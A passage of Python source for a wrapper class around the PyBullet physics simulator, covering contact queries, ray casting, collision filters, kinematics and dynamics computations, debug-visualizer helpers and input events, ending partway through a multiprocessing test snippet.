Returns:
list:
int: contact flag (reserved)
int: body unique id of body A
int: body unique id of body B
int: link index of body A, -1 for base
int: link index of body B, -1 for base
np.array[float[3]]: contact position on A, in Cartesian world coordinates
np.array[float[3]]: contact position on B, in Cartesian world coordinates
np.array[float[3]]: contact normal on B, pointing towards A
float: contact distance, positive for separation, negative for penetration
float: normal force applied during the last `step`
float: lateral friction force in the first lateral friction direction (see next returned value)
np.array[float[3]]: first lateral friction direction
float: lateral friction force in the second lateral friction direction (see next returned value)
np.array[float[3]]: second lateral friction direction
"""
kwargs = {}
if body1 is not None:
kwargs['bodyA'] = body1
if link1_id is not None:
kwargs['linkIndexA'] = link1_id
if body2 is not None:
kwargs['bodyB'] = body2
if link2_id is not None:
kwargs['linkIndexB'] = link2_id
results = self.sim.getContactPoints(**kwargs)
if len(results) == 0:
return results
return [[r[0], r[1], r[2], r[3], r[4], np.asarray(r[5]), np.asarray(r[6]), np.asarray(r[7]), r[8], r[9], r[10],
np.asarray(r[11]), r[12], np.asarray(r[13])] for r in results]
def get_closest_points(self, body1, body2, distance, link1_id=None, link2_id=None):
"""
Computes the closest points, independent from `step`. This also lets you compute closest points of objects
with an arbitrary separating distance. In this query there will be no normal forces reported.
Args:
body1 (int): only report contact points that involve body A
body2 (int): only report contact points that involve body B. Important: you need to have a valid body A
if you provide body B
distance (float): If the distance between objects exceeds this maximum distance, no points may be returned.
link1_id (int): only report contact points that involve link index of body A
link2_id (int): only report contact points that involve link index of body B
Returns:
list:
int: contact flag (reserved)
int: body unique id of body A
int: body unique id of body B
int: link index of body A, -1 for base
int: link index of body B, -1 for base
np.array[float[3]]: contact position on A, in Cartesian world coordinates
np.array[float[3]]: contact position on B, in Cartesian world coordinates
np.array[float[3]]: contact normal on B, pointing towards A
float: contact distance, positive for separation, negative for penetration
float: normal force applied during the last `step`. Always equal to 0.
float: lateral friction force in the first lateral friction direction (see next returned value)
np.array[float[3]]: first lateral friction direction
float: lateral friction force in the second lateral friction direction (see next returned value)
np.array[float[3]]: second lateral friction direction
"""
kwargs = {}
if link1_id is not None:
kwargs['linkIndexA'] = link1_id
if link2_id is not None:
kwargs['linkIndexB'] = link2_id
results = self.sim.getClosestPoints(body1, body2, distance, **kwargs)
if len(results) == 0:
return results
return [[r[0], r[1], r[2], r[3], r[4], np.asarray(r[5]), np.asarray(r[6]), np.asarray(r[7]), r[8], r[9], r[10],
np.asarray(r[11]), r[12], np.asarray(r[13])] for r in results]
def ray_test(self, from_position, to_position):
"""
Performs a single raycast to find the intersection information of the first object hit.
Args:
from_position (np.array[float[3]]): start of the ray in world coordinates
to_position (np.array[float[3]]): end of the ray in world coordinates
Returns:
list:
int: object unique id of the hit object
int: link index of the hit object, or -1 if none/parent
float: hit fraction along the ray in range [0,1] along the ray.
np.array[float[3]]: hit position in Cartesian world coordinates
np.array[float[3]]: hit normal in Cartesian world coordinates
"""
if isinstance(from_position, np.ndarray):
from_position = from_position.ravel().tolist()
if isinstance(to_position, np.ndarray):
to_position = to_position.ravel().tolist()
collisions = self.sim.rayTest(from_position, to_position)
return [[c[0], c[1], c[2], np.asarray(c[3]), np.asarray(c[4])] for c in collisions]
def ray_test_batch(self, from_positions, to_positions, parent_object_id=None, parent_link_id=None):
"""Perform a batch of raycasts to find the intersection information of the first objects hit.
This is similar to the rayTest, but allows you to provide an array of rays, for faster execution. The size of
'rayFromPositions' needs to be equal to the size of 'rayToPositions'. You can one ray result per ray, even if
there is no intersection: you need to use the objectUniqueId field to check if the ray has hit anything: if
the objectUniqueId is -1, there is no hit. In that case, the 'hit fraction' is 1. The maximum number of rays
per batch is `pybullet.MAX_RAY_INTERSECTION_BATCH_SIZE`.
Args:
from_positions (np.array[float[N,3]]): list of start points for each ray, in world coordinates
to_positions (np.array[float[N,3]]): list of end points for each ray in world coordinates
parent_object_id (int): ray from/to is in local space of a parent object
parent_link_id (int): ray from/to is in local space of a parent object
Returns:
list:
int: object unique id of the hit object
int: link index of the hit object, or -1 if none/parent
float: hit fraction along the ray in range [0,1] along the ray.
np.array[float[3]]: hit position in Cartesian world coordinates
np.array[float[3]]: hit normal in Cartesian world coordinates
"""
if isinstance(from_positions, np.ndarray):
from_positions = from_positions.tolist()
if isinstance(to_positions, np.ndarray):
to_positions = to_positions.tolist()
kwargs = {}
if parent_object_id is not None:
kwargs['parentObjectUniqueId'] = parent_object_id
if parent_link_id is not None:
kwargs['parentLinkIndex'] = parent_link_id
results = self.sim.rayTestBatch(from_positions, to_positions, **kwargs)
if len(results) == 0:
return results
return [[r[0], r[1], r[2], np.asarray(r[3]), np.asarray(r[4])] for r in results]
def set_collision_filter_group_mask(self, body_id, link_id, filter_group, filter_mask):
"""
Enable/disable collision detection between groups of objects. Each body is part of a group. It collides with
other bodies if their group matches the mask, and vise versa. The following check is performed using the group
and mask of the two bodies involved. It depends on the collision filter mode.
Args:
body_id (int): unique id of the body to be configured
link_id (int): link index of the body to be configured
filter_group (int): bitwise group of the filter
filter_mask (int): bitwise mask of the filter
"""
self.sim.setCollisionFilterGroupMask(body_id, link_id, filter_group, filter_mask)
def set_collision_filter_pair(self, body1, body2, link1=-1, link2=-1, enable=True):
"""
Enable/disable collision between two bodies/links.
Args:
body1 (int): unique id of body A to be filtered
body2 (int): unique id of body B to be filtered, A==B implies self-collision
link1 (int): link index of body A
link2 (int): link index of body B
enable (bool): True to enable collision, False to disable collision
"""
self.sim.setCollisionFilterPair(body1, body2, link1, link2, int(enable))
###########################
# Kinematics and Dynamics #
###########################
def get_dynamics_info(self, body_id, link_id=-1):
"""
Get dynamic information about the mass, center of mass, friction and other properties of the base and links.
Args:
body_id (int): body/object unique id.
link_id (int): link/joint index or -1 for the base.
Returns:
float: mass in kg
float: lateral friction coefficient
np.array[float[3]]: local inertia diagonal. Note that links and base are centered around the center of
mass and aligned with the principal axes of inertia.
np.array[float[3]]: position of inertial frame in local coordinates of the joint frame
np.array[float[4]]: orientation of inertial frame in local coordinates of joint frame
float: coefficient of restitution
float: rolling friction coefficient orthogonal to contact normal
float: spinning friction coefficient around contact normal
float: damping of contact constraints. -1 if not available.
float: stiffness of contact constraints. -1 if not available.
"""
info = list(self.sim.getDynamicsInfo(body_id, link_id))
for i in range(2, 5):
info[i] = np.asarray(info[i])
return info
def change_dynamics(self, body_id, link_id=-1, mass=None, lateral_friction=None, spinning_friction=None,
rolling_friction=None, restitution=None, linear_damping=None, angular_damping=None,
contact_stiffness=None, contact_damping=None, friction_anchor=None,
local_inertia_diagonal=None, inertia_position=None, inertia_orientation=None,
joint_damping=None, joint_friction=None):
"""
Change dynamic properties of the given body (or link) such as mass, friction and restitution coefficients, etc.
Args:
body_id (int): object unique id, as returned by `load_urdf`, etc.
link_id (int): link index or -1 for the base.
mass (float): change the mass of the link (or base for link index -1)
lateral_friction (float): lateral (linear) contact friction
spinning_friction (float): torsional friction around the contact normal
rolling_friction (float): torsional friction orthogonal to contact normal
restitution (float): bounciness of contact. Keep it a bit less than 1.
linear_damping (float): linear damping of the link (0.04 by default)
angular_damping (float): angular damping of the link (0.04 by default)
contact_stiffness (float): stiffness of the contact constraints, used together with `contact_damping`
contact_damping (float): damping of the contact constraints for this body/link. Used together with
`contact_stiffness`. This overrides the value if it was specified in the URDF file in the contact
section.
friction_anchor (int): enable or disable a friction anchor: positional friction correction (disabled by
default, unless set in the URDF contact section)
local_inertia_diagonal (np.array[float[3]]): diagonal elements of the inertia tensor. Note that the base
and links are centered around the center of mass and aligned with the principal axes of inertia so
there are no off-diagonal elements in the inertia tensor.
inertia_position (np.array[float[3]]): new inertia position with respect to the link frame.
inertia_orientation (np.array[float[4]]): new inertia orientation (expressed as a quaternion [x,y,z,w]
with respect to the link frame.
joint_damping (float): joint damping coefficient applied at each joint. This coefficient is read from URDF
joint damping field. Keep the value close to 0.
`joint_damping_force = -damping_coefficient * joint_velocity`.
joint_friction (float): joint friction coefficient.
"""
kwargs = {}
if mass is not None:
kwargs['mass'] = mass
if lateral_friction is not None:
kwargs['lateralFriction'] = lateral_friction
if spinning_friction is not None:
kwargs['spinningFriction'] = spinning_friction
if rolling_friction is not None:
kwargs['rollingFriction'] = rolling_friction
if restitution is not None:
kwargs['restitution'] = restitution
if linear_damping is not None:
kwargs['linearDamping'] = linear_damping
if angular_damping is not None:
kwargs['angularDamping'] = angular_damping
if contact_stiffness is not None:
kwargs['contactStiffness'] = contact_stiffness
if contact_damping is not None:
kwargs['contactDamping'] = contact_damping
if friction_anchor is not None:
kwargs['frictionAnchor'] = friction_anchor
if local_inertia_diagonal is not None:
kwargs['localInertiaDiagonal'] = local_inertia_diagonal
if joint_damping is not None:
kwargs['jointDamping'] = joint_damping
self.sim.changeDynamics(body_id, link_id, **kwargs)
def calculate_jacobian(self, body_id, link_id, local_position, q, dq, des_ddq):
r"""
Return the full geometric Jacobian matrix :math:`J(q) = [J_{lin}(q)^T, J_{ang}(q)^T]^T`, such that:
.. math:: v = [\dot{p}^T, \omega^T]^T = J(q) \dot{q}
where :math:`\dot{p}` is the Cartesian linear velocity of the link, and :math:`\omega` is its angular velocity.
Warnings: if we have a floating base then the Jacobian will also include columns corresponding to the root
link DoFs (at the beginning). If it is a fixed base, it will only have columns associated with the joints.
Args:
body_id (int): unique body id.
link_id (int): link id.
local_position (np.array[float[3]]): the point on the specified link to compute the Jacobian (in link
local coordinates around its center of mass). If None, it will use the CoM position (in the link frame).
q (np.array[float[N]]): joint positions of size N, where N is the number of DoFs.
dq (np.array[float[N]]): joint velocities of size N, where N is the number of DoFs.
des_ddq (np.array[float[N]]): desired joint accelerations of size N.
Returns:
np.array[float[6,N]], np.array[float[6,6+N]]: full geometric (linear and angular) Jacobian matrix. The
number of columns depends if the base is fixed or floating.
"""
# Note that q, dq, ddq have to be lists in PyBullet (it doesn't work with numpy arrays)
if isinstance(local_position, np.ndarray):
local_position = local_position.ravel().tolist()
if isinstance(q, np.ndarray):
q = q.ravel().tolist()
if isinstance(dq, np.ndarray):
dq = dq.ravel().tolist()
if isinstance(des_ddq, np.ndarray):
des_ddq = des_ddq.ravel().tolist()
# calculate full jacobian
lin_jac, ang_jac = self.sim.calculateJacobian(body_id, link_id, localPosition=local_position,
objPositions=q, objVelocities=dq, objAccelerations=des_ddq)
return np.vstack((lin_jac, ang_jac))
def calculate_mass_matrix(self, body_id, q):
r"""
Return the mass/inertia matrix :math:`H(q)`, which is used in the rigid-body equation of motion (EoM) in joint
space given by (see [1]):
.. math:: \tau = H(q)\ddot{q} + C(q,\dot{q})
where :math:`\tau` is the vector of applied torques, :math:`H(q)` is the inertia matrix, and
:math:`C(q,\dot{q}) \dot{q}` is the vector accounting for Coriolis, centrifugal forces, gravity, and any
other forces acting on the system except the applied torques :math:`\tau`.
Warnings: If the base is floating, it will return a [6+N,6+N] inertia matrix, where N is the number of actuated
joints. If the base is fixed, it will return a [N,N] inertia matrix
Args:
body_id (int): body unique id.
q (np.array[float[N]]): joint positions of size N, where N is the total number of DoFs.
Returns:
np.array[float[N,N]], np.array[float[6+N,6+N]]: inertia matrix
"""
if isinstance(q, np.ndarray):
q = q.ravel().tolist() # Note that pybullet doesn't accept numpy arrays here
return np.asarray(self.sim.calculateMassMatrix(body_id, q))
def calculate_inverse_kinematics(self, body_id, link_id, position, orientation=None, lower_limits=None,
upper_limits=None, joint_ranges=None, rest_poses=None, joint_dampings=None,
solver=None, q_curr=None, max_iters=None, threshold=None):
r"""
Compute the FULL Inverse kinematics; it will return a position for all the actuated joints.
"You can compute the joint angles that makes the end-effector reach a given target position in Cartesian world
space. Internally, Bullet uses an improved version of Samuel Buss Inverse Kinematics library. At the moment
only the Damped Least Squares method with or without Null Space control is exposed, with a single end-effector
target. Optionally you can also specify the target orientation of the end effector. In addition, there is an
option to use the null-space to specify joint limits and rest poses. This optional null-space support requires
all 4 lists (lower_limits, upper_limits, joint_ranges, rest_poses), otherwise regular IK will be used." [1]
Args:
body_id (int): body unique id, as returned by `load_urdf`, etc.
link_id (int): end effector link index.
position (np.array[float[3]]): target position of the end effector (its link coordinate, not center of mass
coordinate!). By default this is in Cartesian world space, unless you provide `q_curr` joint angles.
orientation (np.array[float[4]]): target orientation in Cartesian world space, quaternion [x,y,w,z]. If not
specified, pure position IK will be used.
lower_limits (np.array[float[N]], list of N floats): lower joint limits. Optional null-space IK.
upper_limits (np.array[float[N]], list of N floats): upper joint limits. Optional null-space IK.
joint_ranges (np.array[float[N]], list of N floats): range of value of each joint.
rest_poses (np.array[float[N]], list of N floats): joint rest poses. Favor an IK solution closer to a given
rest pose.
joint_dampings (np.array[float[N]], list of N floats): joint damping factors. Allow to tune the IK solution
using joint damping factors.
solver (int): p.IK_DLS (=0) or p.IK_SDLS (=1), Damped Least Squares or Selective Damped Least Squares, as
described in the paper by Samuel Buss "Selectively Damped Least Squares for Inverse Kinematics".
q_curr (np.array[float[N]]): list of joint positions. By default PyBullet uses the joint positions of the
body. If provided, the target_position and targetOrientation is in local space!
max_iters (int): maximum number of iterations. Refine the IK solution until the distance between target
and actual end effector position is below this threshold, or the `max_iters` is reached.
threshold (float): residual threshold. Refine the IK solution until the distance between target and actual
end effector position is below this threshold, or the `max_iters` is reached.
Returns:
np.array[float[N]]: joint positions (for each actuated joint).
"""
kwargs = {}
if orientation is not None:
if isinstance(orientation, np.ndarray):
orientation = orientation.ravel().tolist()
kwargs['targetOrientation'] = orientation
if lower_limits is not None and upper_limits is not None and joint_ranges is not None and \
rest_poses is not None:
kwargs['lowerLimits'], kwargs['upperLimits'] = lower_limits, upper_limits
kwargs['jointRanges'], kwargs['restPoses'] = joint_ranges, rest_poses
if q_curr is not None:
if isinstance(q_curr, np.ndarray):
q_curr = q_curr.ravel().tolist()
kwargs['currentPosition'] = q_curr
if joint_dampings is not None:
if isinstance(joint_dampings, np.ndarray):
joint_dampings = joint_dampings.ravel().tolist()
kwargs['jointDamping'] = joint_dampings
if solver is not None:
kwargs['solver'] = solver
if max_iters is not None:
kwargs['maxNumIterations'] = max_iters
if threshold is not None:
kwargs['residualThreshold'] = threshold
return np.asarray(self.sim.calculateInverseKinematics(body_id, link_id, position, **kwargs))
def calculate_inverse_dynamics(self, body_id, q, dq, des_ddq):
r"""
Starting from the specified joint positions :math:`q` and velocities :math:`\dot{q}`, it computes the joint
torques :math:`\tau` required to reach the desired joint accelerations :math:`\ddot{q}_{des}`. That is,
:math:`\tau = ID(model, q, \dot{q}, \ddot{q}_{des})`.
Specifically, it uses the rigid-body equation of motion in joint space given by (see [1]):
.. math:: \tau = H(q)\ddot{q} + C(q,\dot{q})
where :math:`\tau` is the vector of applied torques, :math:`H(q)` is the inertia matrix, and
:math:`C(q,\dot{q}) \dot{q}` is the vector accounting for Coriolis, centrifugal forces, gravity, and any
other forces acting on the system except the applied torques :math:`\tau`.
Normally, a more popular form of this equation of motion (in joint space) is given by:
.. math:: H(q) \ddot{q} + S(q,\dot{q}) \dot{q} + g(q) = \tau + J^T(q) F
which is the same as the first one with :math:`C = S\dot{q} + g(q) - J^T(q) F`. However, this last formulation
is useful to understand what happens when we set some variables to 0.
Assuming that there are no forces acting on the system, and giving desired joint accelerations of 0, this
method will return :math:`\tau = S(q,\dot{q}) \dot{q} + g(q)`. If in addition joint velocities are also 0,
it will return :math:`\tau = g(q)` which can for instance be useful for gravity compensation.
For forward dynamics, which computes the joint accelerations given the joint positions, velocities, and
torques (that is, :math:`\ddot{q} = FD(model, q, \dot{q}, \tau)`, this can be computed using
:math:`\ddot{q} = H^{-1} (\tau - C)` (see also `computeFullFD`). For more information about different
control schemes (position, force, impedance control and others), or about the formulation of the equation
of motion in task/operational space (instead of joint space), check the references [1-4].
Args:
body_id (int): body unique id.
q (np.array[float[N]]): joint positions
dq (np.array[float[N]]): joint velocities
des_ddq (np.array[float[N]]): desired joint accelerations
Returns:
np.array[float[N]]: joint torques computed using the rigid-body equation of motion
References:
- [1] "Rigid Body Dynamics Algorithms", Featherstone, 2008, chap1.1
- [2] "Robotics: Modelling, Planning and Control", Siciliano et al., 2010
- [3] "Springer Handbook of Robotics", Siciliano et al., 2008
- [4] Lecture on "Impedance Control" by Prof. De Luca, Universita di Roma,
http://www.diag.uniroma1.it/~deluca/rob2_en/15_ImpedanceControl.pdf
"""
# convert numpy arrays to lists
if isinstance(q, np.ndarray):
q = q.ravel().tolist()
if isinstance(dq, np.ndarray):
dq = dq.ravel().tolist()
if isinstance(des_ddq, np.ndarray):
des_ddq = des_ddq.ravel().tolist()
# return the joint torques to be applied for the desired joint accelerations
return np.asarray(self.sim.calculateInverseDynamics(body_id, q, dq, des_ddq))
def calculate_forward_dynamics(self, body_id, q, dq, torques):
r"""
Given the specified joint positions :math:`q` and velocities :math:`\dot{q}`, and joint torques :math:`\tau`,
it computes the joint accelerations :math:`\ddot{q}`. That is, :math:`\ddot{q} = FD(model, q, \dot{q}, \tau)`.
Specifically, it uses the rigid-body equation of motion in joint space given by (see [1]):
.. math:: \ddot{q} = H(q)^{-1} (\tau - C(q,\dot{q}))
where :math:`\tau` is the vector of applied torques, :math:`H(q)` is the inertia matrix, and
:math:`C(q,\dot{q}) \dot{q}` is the vector accounting for Coriolis, centrifugal forces, gravity, and any
other forces acting on the system except the applied torques :math:`\tau`.
Normally, a more popular form of this equation of motion (in joint space) is given by:
.. math:: H(q) \ddot{q} + S(q,\dot{q}) \dot{q} + g(q) = \tau + J^T(q) F
which is the same as the first one with :math:`C = S\dot{q} + g(q) - J^T(q) F`. However, this last formulation
is useful to understand what happens when we set some variables to 0.
Assuming that there are no forces acting on the system, and giving desired joint torques of 0, this
method will return :math:`\ddot{q} = - H(q)^{-1} (S(q,\dot{q}) \dot{q} + g(q))`. If in addition
the joint velocities are also 0, it will return :math:`\ddot{q} = - H(q)^{-1} g(q)` which are
the accelerations due to gravity.
For inverse dynamics, which computes the joint torques given the joint positions, velocities, and
accelerations (that is, :math:`\tau = ID(model, q, \dot{q}, \ddot{q})`, this can be computed using
:math:`\tau = H(q)\ddot{q} + C(q,\dot{q})`. For more information about different
control schemes (position, force, impedance control and others), or about the formulation of the equation
of motion in task/operational space (instead of joint space), check the references [1-4].
Args:
body_id (int): unique body id.
q (np.array[float[N]]): joint positions
dq (np.array[float[N]]): joint velocities
torques (np.array[float[N]]): desired joint torques
Returns:
np.array[float[N]]: joint accelerations computed using the rigid-body equation of motion
References:
- [1] "Rigid Body Dynamics Algorithms", Featherstone, 2008, chap1.1
- [2] "Robotics: Modelling, Planning and Control", Siciliano et al., 2010
- [3] "Springer Handbook of Robotics", Siciliano et al., 2008
- [4] Lecture on "Impedance Control" by Prof. De Luca, Universita di Roma,
http://www.diag.uniroma1.it/~deluca/rob2_en/15_ImpedanceControl.pdf
"""
# convert numpy arrays to lists
if isinstance(q, np.ndarray):
q = q.ravel().tolist()
# compute and return joint accelerations
torques = np.asarray(torques)
Hinv = np.linalg.inv(self.calculate_mass_matrix(body_id, q))
C = self.calculate_inverse_dynamics(body_id, q, dq, np.zeros(len(q)))
acc = Hinv.dot(torques - C)
return acc
#########
# Debug #
#########
def add_user_debug_line(self, from_pos, to_pos, rgb_color=None, width=None, lifetime=None, parent_object_id=None,
parent_link_id=None, line_id=None):
"""Add a user debug line in the simulator.
You can add a 3d line specified by a 3d starting point (from) and end point (to), a color [red,green,blue],
a line width and a duration in seconds.
Args:
from_pos (np.array[float[3]]): starting point of the line in Cartesian world coordinates
to_pos (np.array[float[3]]): end point of the line in Cartesian world coordinates
rgb_color (np.array[float[3]]): RGB color (each channel in range [0,1])
width (float): line width (limited by OpenGL implementation).
lifetime (float): use 0 for permanent line, or positive time in seconds (afterwards the line with be
removed automatically)
parent_object_id (int): draw line in local coordinates of a parent object.
parent_link_id (int): draw line in local coordinates of a parent link.
line_id (int): replace an existing line item (to avoid flickering of remove/add).
Returns:
int: unique user debug line id.
"""
kwargs = {}
if rgb_color is not None:
kwargs['lineColorRGB'] = rgb_color
if width is not None:
kwargs['lineWidth'] = width
if lifetime is not None:
kwargs['lifeTime'] = lifetime
if parent_object_id is not None:
kwargs['parentObjectUniqueId'] = parent_object_id
if parent_link_id is not None:
kwargs['parentLinkIndex'] = parent_link_id
if line_id is not None:
kwargs['replaceItemUniqueId'] = line_id
return self.sim.addUserDebugLine(lineFromXYZ=from_pos, lineToXYZ=to_pos, **kwargs)
def add_user_debug_text(self, text, position, rgb_color=None, size=None, lifetime=None, orientation=None,
parent_object_id=None, parent_link_id=None, text_id=None):
"""
Add 3D text at a specific location using a color and size.
Args:
text (str): text.
position (np.array[float[3]]): 3d position of the text in Cartesian world coordinates.
rgb_color (list/tuple of 3 floats): RGB color; each component in range [0..1]
size (float): text size
lifetime (float): use 0 for permanent text, or positive time in seconds (afterwards the text with be
removed automatically)
orientation (np.array[float[4]]): By default, debug text will always face the camera, automatically
rotation. By specifying a text orientation (quaternion), the orientation will be fixed in world space
or local space (when parent is specified). Note that a different implementation/shader is used for
camera facing text, with different appearance: camera facing text uses bitmap fonts, text with
specified orientation uses TrueType font.
parent_object_id (int): draw text in local coordinates of a parent object.
parent_link_id (int): draw text in local coordinates of a parent link.
text_id (int): replace an existing text item (to avoid flickering of remove/add).
Returns:
int: unique user debug text id.
"""
kwargs = {}
if rgb_color is not None:
kwargs['textColorRGB'] = rgb_color
if size is not None:
kwargs['textSize'] = size
if lifetime is not None:
kwargs['lifeTime'] = lifetime
if orientation is not None:
kwargs['textOrientation'] = orientation
if parent_object_id is not None:
kwargs['parentObjectUniqueId'] = parent_object_id
if parent_link_id is not None:
kwargs['parentLinkIndex'] = parent_link_id
if text_id is not None:
kwargs['replaceItemUniqueId'] = text_id
return self.sim.addUserDebugText(text=text, textPosition=position, **kwargs)
def add_user_debug_parameter(self, name, min_range, max_range, start_value):
"""
Add custom sliders to tune parameters.
Args:
name (str): name of the parameter.
min_range (float): minimum value.
max_range (float): maximum value.
start_value (float): starting value.
Returns:
int: unique user debug parameter id.
"""
return self.sim.addUserDebugParameter(paramName=name, rangeMin=min_range, rangeMax=max_range,
startValue=start_value)
def read_user_debug_parameter(self, parameter_id):
"""
Read the value of the parameter / slider.
Args:
parameter_id: unique user debug parameter id.
Returns:
float: reading of the parameter.
"""
return self.sim.readUserDebugParameter(parameter_id)
def remove_user_debug_item(self, item_id):
"""
Remove the specified user debug item (line, text, parameter) from the simulator.
Args:
item_id (int): unique id of the debug item to be removed (line, text etc)
"""
self.sim.removeUserDebugItem(item_id)
def remove_all_user_debug_items(self):
"""
Remove all user debug items from the simulator.
"""
self.sim.removeAllUserDebugItems()
def set_debug_object_color(self, object_id, link_id, rgb_color=(1, 0, 0)):
"""
Override the color of a specific object and link.
Args:
object_id (int): unique object id.
link_id (int): link id.
rgb_color (float[3]): RGB debug color.
"""
self.sim.setDebugObjectColor(object_id, link_id, rgb_color)
def add_user_data(self, object_id, key, value):
"""
Add user data (at the moment text strings) attached to any link of a body. You can also override a previous
given value. You can add multiple user data to the same body/link.
Args:
object_id (int): unique object/link id.
key (str): key string.
value (str): value string.
Returns:
int: user data id.
"""
return self.sim.addUserData(object_id, key, value)
def num_user_data(self, object_id):
"""
Return the number of user data associated with the specified object/link id.
Args:
object_id (int): unique object/link id.
Returns:
int: the number of user data
"""
return self.sim.getNumUserData(object_id)
def get_user_data(self, user_data_id):
"""
Get the specified user data value.
Args:
user_data_id (int): unique user data id.
Returns:
str: value string.
"""
return self.sim.getUserData(user_data_id)
def get_user_data_id(self, object_id, key):
"""
Get the specified user data id.
Args:
object_id (int): unique object/link id.
key (str): key string.
Returns:
int: user data id.
"""
return self.sim.getUserDataId(object_id, key)
def get_user_data_info(self, object_id, index):
"""
Get the user data info associated with the given object and index.
Args:
object_id (int): unique object id.
index (int): index (should be between [0, self.num_user_data(object_id)]).
Returns:
int: user data id.
str: key.
int: body id.
int: link index
int: visual shape index.
"""
return self.sim.getUserDataInfo(object_id, index)
def remove_user_data(self, user_data_id):
"""
Remove the specified user data.
Args:
user_data_id (int): user data id.
"""
self.sim.removeUserData(user_data_id)
def sync_user_data(self):
"""
Synchronize the user data.
"""
self.sim.syncUserData()
def configure_debug_visualizer(self, flag, enable):
"""Configure the debug visualizer camera.
Configure some settings of the built-in OpenGL visualizer, such as enabling or disabling wireframe,
shadows and GUI rendering.
Args:
flag (int): The feature to enable or disable, such as
COV_ENABLE_WIREFRAME (=3): show/hide the collision wireframe
COV_ENABLE_SHADOWS (=2): show/hide shadows
COV_ENABLE_GUI (=1): enable/disable the GUI
COV_ENABLE_VR_PICKING (=5): enable/disable VR picking
COV_ENABLE_VR_TELEPORTING (=4): enable/disable VR teleporting
COV_ENABLE_RENDERING (=7): enable/disable rendering
COV_ENABLE_TINY_RENDERER (=12): enable/disable tiny renderer
COV_ENABLE_VR_RENDER_CONTROLLERS (=6): render VR controllers
COV_ENABLE_KEYBOARD_SHORTCUTS (=9): enable/disable keyboard shortcuts
COV_ENABLE_MOUSE_PICKING (=10): enable/disable mouse picking
COV_ENABLE_Y_AXIS_UP (Z is default world up axis) (=11): enable/disable Y axis up
COV_ENABLE_RGB_BUFFER_PREVIEW (=13): enable/disable RGB buffer preview
COV_ENABLE_DEPTH_BUFFER_PREVIEW (=14): enable/disable Depth buffer preview
COV_ENABLE_SEGMENTATION_MARK_PREVIEW (=15): enable/disable segmentation mark preview
enable (bool): False (disable) or True (enable)
"""
self.sim.configureDebugVisualizer(flag, int(enable))
def get_debug_visualizer(self):
"""Get information about the debug visualizer camera.
Returns:
int: width of the visualizer camera
int: height of the visualizer camera
np.array[float[4,4]]: view matrix [4,4]
np.array[float[4,4]]: perspective projection matrix [4,4]
np.array[float[3]]: camera up vector expressed in the Cartesian world space
np.array[float[3]]: forward axis of the camera expressed in the Cartesian world space
np.array[float[3]]: This is a horizontal vector that can be used to generate rays (for mouse picking or
creating a simple ray tracer for example)
np.array[float[3]]: This is a vertical vector that can be used to generate rays (for mouse picking or
creating a simple ray tracer for example)
float: yaw angle (in radians) of the camera, in Cartesian local space coordinates
float: pitch angle (in radians) of the camera, in Cartesian local space coordinates
float: distance between the camera and the camera target
np.array[float[3]]: target of the camera, in Cartesian world space coordinates
"""
width, height, view, proj, up_vec, forward_vec,\
horizontal, vertical, yaw, pitch, dist, target = self.sim.getDebugVisualizerCamera()
# convert data to the correct data type
view = np.asarray(view).reshape(4, 4).T
proj = np.asarray(proj).reshape(4, 4).T
up_vec = np.asarray(up_vec)
forward_vec = np.asarray(forward_vec)
horizontal = np.asarray(horizontal)
vertical = np.asarray(vertical)
target = np.asarray(target)
yaw = np.deg2rad(yaw)
pitch = np.deg2rad(pitch)
# return the data
return width, height, view, proj, up_vec, forward_vec, horizontal, vertical, yaw, pitch, dist, target
def reset_debug_visualizer(self, distance, yaw, pitch, target_position):
"""Reset the debug visualizer camera.
Reset the 3D OpenGL debug visualizer camera distance (between eye and camera target position), camera yaw and
pitch and camera target position
Args:
distance (float): distance from eye to camera target position
yaw (float): camera yaw angle (in radians) left/right
pitch (float): camera pitch angle (in radians) up/down
target_position (np.array[float[3]]): target focus point of the camera
"""
self.sim.resetDebugVisualizerCamera(cameraDistance=distance, cameraYaw=np.rad2deg(yaw),
cameraPitch=np.rad2deg(pitch), cameraTargetPosition=target_position)
############################
# Events (mouse, keyboard) #
############################
def get_keyboard_events(self):
"""Get the key events.
Returns:
dict: {keyId: keyState}
* `keyID` is an integer (ascii code) representing the key. Some special keys like shift, arrows,
and others are are defined in pybullet such as `B3G_SHIFT`, `B3G_LEFT_ARROW`, `B3G_UP_ARROW`,...
* `keyState` is an integer. 3 if the button has been pressed, 1 if the key is down, 2 if the key has
been triggered.
"""
return self.sim.getKeyboardEvents()
def get_mouse_events(self):
"""Get the mouse events.
Returns:
list of mouse events:
eventType (int): 1 if the mouse is moving, 2 if a button has been pressed or released
mousePosX (float): x-coordinates of the mouse pointer
mousePosY (float): y-coordinates of the mouse pointer
buttonIdx (int): button index for left/middle/right mouse button. It is -1 if nothing,
0 if left button, 1 if scroll wheel (pressed), 2 if right button
buttonState (int): 0 if nothing, 3 if the button has been pressed, 4 is the button has been released,
1 if the key is down (never observed), 2 if the key has been triggered (never
observed).
"""
return self.sim.getMouseEvents()
def get_mouse_and_keyboard_events(self):
"""Get the mouse and key events.
Returns:
list: list of mouse events
dict: dictionary of key events
"""
return self.sim.getMouseEvents(), self.sim.getKeyboardEvents()
# Tests
if __name__ == "__main__":
# The following snippet code will test the `multiprocessing` library with the `Bullet` simulator in the GUI mode.
# We spawn 2 other processes, thus counting the main process, there are 3 processes in total.
# In the main one, you will just see the world with only the floor. In the two others, you will see that a ball
# has been added. The main process communicates with the 2 slave processes via pipes; it notably ask them to
# start to drop the ball or to exit. Once the simulation is over, it will return if the ball has been in contact
# with the floor at the last time step via a queue.
import multiprocessing
# define variables
num_processes = 2
# create simulator
sim = Bullet(render=True)
sim.configure_debug_visualizer(sim.COV_ENABLE_GUI, 0)
sim.set_gravity([0., 0., -9.81])
# load floor and sphere
sim.load_urdf('plane.urdf', use_fixed_base=True, scale=1.)
# sim.load_urdf("sphere_small.urdf", position=[0, 0, 3])
# print info
print("Available URDFs: {}".format(sim.get_available_urdfs(fullpath=False)))
# print("Available SDFs: {}".format(sim.get_available_sdfs(fullpath=False)))
# print("Available MJCFs: {}".format(sim.get_available_mjcfs(fullpath=False)))
# print("Available OBJs: {}".format(sim.get_available_objs(fullpath=False)))
# hide the simulator (i.e. switch to DIRECT mode)
sim.hide()
# target function for each process
def function(pipe, queue, simulator):
process = multiprocessing.current_process()
print("{}: start".format(process.name))
# get info fro previous simulator
class_ = simulator.__class__
kwargs = simulator.kwargs
# create simulator and world (with visualization)
print("{}: create simulator and world".format(process.name))
sim = class_(render=True)
sim.reset_scene_camera(simulator.camera)
